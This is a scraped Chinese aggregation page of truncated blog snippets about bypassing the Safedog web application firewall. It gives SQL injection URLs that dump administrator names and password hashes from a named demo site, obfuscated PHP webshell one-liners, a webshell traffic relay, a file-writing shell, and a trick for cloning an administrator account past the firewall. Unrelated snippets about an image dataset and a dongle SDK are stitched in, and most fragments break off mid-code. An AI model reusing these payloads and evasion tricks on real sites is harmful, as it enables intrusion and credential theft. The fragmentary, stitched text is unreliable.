中转Webshell 绕过安全狗(二)】的更多相关文章

前言 在实践中转webshell绕过安全狗(一)中,在服务端和客户端均为php.某大佬提示并分享资源后,打算使用python完成中转.部分代码无耻copy. 客户端 本地127.0.0.1,安装python2phpshellproxy.py #coding=utf-8 import sys reload(sys) sys.setdefaultencoding('utf-8') import web urls = ( '/','index', '/reverse','reverse', ) #re…
前言 听说中国菜刀里有后门.抓包我是没有监测到异常数据包.为了以防万一,且更好使用中国菜刀硬杠安全狗.笔者收集了一下资料.无耻的copy大佬的源码,只是在大佬的基础上简单修改了一下,达到Webshell绕过安全狗.原理 菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数全部进行加密,然后再发送给shell,shell接收后用同样的算法进行解密,执行命令. 客户端 本地127.0.0.1,安装phpstudytransfer.php <?php function en…
绕过安全狗sql注入 http://demo.74cms.com/plus/ajax_common.php?act=hotwordquery=錦union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 被拦截了,经过测试拦截的是select,那么把select换成/*!50000SeLect*/呢 然后提交 http://demo.7 被拦截了,经过测试拦截的是select,那么把s…
00x01安全狗的确是让人很头痛,尤其是在上传一句话或者写入一句话的时候,会被安全狗拦截从而拿不下shell.当然,安全狗是最简单的一款waf,很容易就进行一个绕过.00x02对于绕过安全狗跟360,我姿势不多,但是却很实用为以下两种 1.#可变变量2.#引用变量 00x03##可变变量(菜刀可能报错)<@eval($_POST['x'])复制代码 经常使用的人都知道,只是最简单的一句话,不过任何waf与规则我们先来加入需要的函数<?php$a='b';$b=$_POST['x'];@eval…
本文作者:i春秋签约作家——酷帥王子 一. 利用getwebshell篇 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 下面我们构造一个asp目录,如: http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp…
WebShell代码分析溯源(二) 一.一句话变形马样本 <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> 二.代码分析 1.调整代码格式 2.分析代码,首先先把”assert”字符串复制给POST数组,然后又把POST数组array数组,调试代码,搭建php环境(这里使用phpstudy) 3.发现结果输出为assert 4.这样最终一句话变形马就变成这样: <?php…
转载请加原文链接:https://www.cnblogs.com/Yang34/p/12055052.html 微信公众号:信Yang安全.同步更新,欢迎关注.文末有二维码. 正好最近在搞注入,昨天现装的安全狗练练手,搭建环境如下图:…
1.什么是SQL注入攻击 SQL注入攻击指的是通过构造特殊的输入作为参数插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令 http://www.xxx.com/list.php?id=1 http://www.xxx.com/list.php?id=1 and user()>0 -- [ ] 哪里存在sql注入 GET,POST,HTTP头部注入,Cookie注入,任何客户端可控,传递到服务器的变量 [ ]漏洞原理 程序编写者在处理程序和数据库交互时,使用字符串拼接…
原数据集:包含 25000张猫狗图像,两个类别各有12500 新数据集:猫.狗 (照片大小不一样) 训练集:各1000个样本 验证集:各500个样本 测试集:各500个样本 1= 狗,0= 猫 # 将图像复制到训练.验证和测试的目录 import os,shutil orginal_dataset_dir = 'kaggle_original_data/train' base_dir = 'cats_and_dogs_small' os.mkdir(base_dir)#保存新数据集的目录 tra…
本文主要讲解如果使用C#语言来对超级狗进行二次开发,如果仅仅是做个激活的功能,可以参照另一篇博客,地址:http://www.cnblogs.com/dathlin/p/8487842.html 如果疑问,可以加QQ群:592132877 继续主题研究,如果使用C#来对超级狗进行二次开发. 楼主在研究这个超级狗的时候,直接某宝购买了开发狗和子狗两个狗,并没有购买demo狗,所以后来在研究开发套件里的Demo项目时,老是提醒找不到超级狗,一定要开发套件里生成的公司的独一无二的组件进行访问. 第一步…
CDN       负载均衡.内容分发 解析漏洞一般在服务层      二进制,溢出,提权在系统层         渗透测试就是以上全部层 协议未正确解析 GET改POST   这叫参数污染 cookie    改一个较大的值     有的waf承受不了这么大的值,参数污染 HTTP参数污染  HPP参数污染     使用多个无用值或者重复值提交到数据包中达到攻击 提交两个filename值,这要看具体什么服务器,两个一样的参数是哪一个参数生效 waf有正则匹配拦截,我们要找到拦截点在哪里.绕过…
=绕过 like regexp(匹配)> < (测试安全狗 ><不可以绕过) 注释+换行(%0a作为垃圾数据填充) 联合查询绕过 探测出当union select 出现时会拦截,则采用/**/加换行填充逃过(绕过先写正确的注释,再在注释中添加) 4.查询时绕过(当有括号时不用空格,避免触发特征) http://192.168.231.110/sqli/less-1/?id=-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat…
上次是修改程序的标题,大家应该感觉这只是一个起点而已,接下来我们可以尝试绕过序列号验证,这种技术应用在很多软件中,比如淘宝上要买什么的软件,商家都会发给`你一个用户名和密码,而且还有试用期什么的,这确实令我们很懊恼,但是OD可以帮我们解决这个问题. 例如下面这个程序: 类似于这种程序,先将它拖进OD: 用户名和密码应该是属于文本的获取,这时可以了解到,在win32中,有两种比较常用的获取文本的函数: GetDlgItemText(A W) GetWindowText(A W)    A参数代表A…
没做免杀之前,被狗咬死: 直接上代码: $p=realpath(dirname(__FILE__)."/../").$_POST["a"];$t=$_POST["b"];$tt="";for ($i=0;$i @fwrite(fopen($p,"w"),$tt);echo "success!";?> 代码分析: $p=realpath(dirname(__FILE__)."…
这次说到注入时空格的过滤 ①注释绕过空格 我们在查看user()的时候需要用到空格 如: select user(): 然后我们用 /**/ 来绕过 ②加号绕过空格(不太建议使用除个别情况) 其实  空格可以用+号代替 如: select+user(): 虽然这样可以查询到数据 但仔细发现,查询的目标为+user()了 但是返回的数据是一样的 不仅仅是user()其他的也可以 比如 select @@basedir 和 select+@@basedir 估计这个只能用于单个语句中 例如selec…
<?php $target="url";//shell 地址 菜刀连这个脚本做中转 $post=''; $i=0; foreach($_POST AS $K=>$V) { if(strstr($v,"base64_decode")) { $v=str_replace("base64_decode(","",$v); $v=str_replace("))",")",$v); }…
参数拦截:script.空格and空格.空格or空格.union select.user() 绕过: and.order by绕过:  内联注释 union select绕过: union%23%0a%23%0aSeLecT/**/1,2,3 user()绕过 : user%23%0a()…
Pytorch学习系列(一)至(四)均摘自<深度学习框架PyTorch入门与实践>陈云 目录: 1.程序的主要功能 2.文件组织架构 3. 关于`__init__.py` 4.数据处理 5.模型定义 6.工具函数 7.配置文件 8.main.py 9.使用 1.程序的主要功能: 模型定义    数据加载    训练和测试 2.文件组织架构: ```├── checkpoints/├── data/│   ├── __init__.py│   ├── dataset.py│   └── get_…
PHP常见的代码执行函数: eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_filter usort uasort() PHP常见的命令执行函数 system() exec() shell_exec() passthru() pcntl_exec() popen() proc_open() 常见的一句话 <?php eval($_P…
可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def…
本文来源:https://www.webshell.ren/post-308.html 今天有一位朋友发一个上传点给我 我一看是南方cms 有双文件上传漏洞 本来可以秒的 但是看到了 安全狗 从图片可以看到http返回信息 有安全狗拦截  哪怎么办呢   我也是搞了以前私藏的姿势 后来发现都不行 发现行不通 只能继续搞 之后发现Content-Type: multipart/form-data; boundary= 这个数据包 会不会是安全狗 通过这个后面的字符串来验证 在头字符串后面随便添加字…
0x01 前言 目前市场上的WAF主要有以下几类 1. 以安全狗为代表的基于软件WAF 2. 百度加速乐.安全宝等部署在云端的WAF 3. 硬件WAF WAF的检测主要有三个阶段,我画了一张图进行说明 本文主要总结的就是针对上面的三个阶段的绕过策略.小菜一枚,欢迎拍砖. 0x02 WAF身份认证阶段的绕过 WAF是有一个白名单的,在白名单内的客户请求将不做检测 (1)伪造搜索引擎 早些版本的安全狗是有这个漏洞的,就是把User-Agent修改为搜索引擎,便可以绕过,进行sql注入等攻击,论坛bl…
WAF绕过神器 (过安全狗.智创SQL注入) 发布时间:-- :10文章来源:网络文章作者:panni007 点击次数: 次 分享到: QQ空间 QQ微博 新浪微博 开心网 人人网 摘要:起因: bystander分享了简单绕过安全狗进行任何操作 让狗形同虚设, 其中有个秒安全狗神器,刚好论坛有个关于安全狗突破的求助网站,我去试了试,发现可行,但是有一个问题: 就是上传后,无法查看源文件来看看上传后的地址..只能通过抓包来看了..在加上... 起因: bystander分享了 简单绕过安全狗进行…
转自圈子404师傅 0x01 前言# 尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧 0x02 目录# 关于eval 于 assert 字符串变形 定义函数绕过 回调函数 回调函数变形 特殊字符干扰 数组 类 编码绕过 无字符特征马 PHP7.1后webshell何去何从 总结 0x03 关于eval 于 assert# 关于eval函数在php给出的官方说明是 eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给…
很多拿站的朋友,都知道大马很多都会被安全狗拦截,最近一个大牛给我一个方法,竟然成功,所以分享下这个方法. 将大马写到一个txt文件里面,命名为dama.txt,再建一个文本文档,asp的就写入:<!–#include file=”dama.txt”–> ,保存为X.asp,两个文件传同目录下,访问url/x.asp就是我们的大马了.就这样无视安全狗的存在拿下了我们想要的webshell   php的同样的原理,dama.txt,php文件写入:<?php require_once (“d…
仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页 先去安全狗网站下载最新的安全狗版本 从官网下载 windwos apache版 v4.0.2395  最新版   数据库是mysql 5.6 1.首先判断是否有注入点包括是字符型还是数字型注入 我们假设他是数字型注入 构造 id=0=0 在数据库中执行 获取了全部数据  从返回的数据 我们立马断定他是数字型注入   而如果是字符型注入  代码里应该是   where id='$id'   就是 select * from `use…
关系型数据库 关系型数据库:指采用了关系模型来组织数据的数据库. 直白的说就是:关系型数据库最典型的数据结构是表,由二维表及其之间的联系所组成的一个数据组织 当今主流的关系型数据库有:Oracle,Microsoft SQL Server,MySQL,PostgreSQL,DB2, Microsoft Access, SQLite,MariaDB Oracle Oracle特性: select id,contents,time from news where news_id=1 ① union…
那些容易被忽略.容易被弄错的地方 sql注入时的技巧 ========================================================================= * 如果单引号被转义,在当前数据库采用GBK编码的前提下,可以考虑双字节注入. * 注释符的正确用法 “-- ”才是mysql中的注释,注意后面有个空格 mysql> select user() from (select 1)x where '1'='1';-- ' +--------------…
记一次入侵时发现可以增加用户,但是由于狗的存在,无法赋予管理员权限 此时就进行类似使用注册表的复制超级管理员的操作 使用MT的克隆功能, net user test test /add mt -clone administrator test 绕过安全狗,轻松增加用户,…
俗话说只要思路宽,绕狗绕的欢.前段时间我有尝试着用以下的方法绕狗,效果还不错.不过这方法呢也许这段时间可以绕过,过段时间可能就失效了,大家还是要多去尝试找到更多的方法. 举例-->整型注入 绕过WAF 绕过方法: 就是修改大小写 加%0a 或%0d去绕过(%0a是换行,%0d是回车) 如: and 1=1   可能会被过滤可改为  /*%0Aand%0a*/ 1=1  或  and 'a' in('a','b') 或  /*%0AaNd%0A*/ 1=1 Order by 7 可改为 group…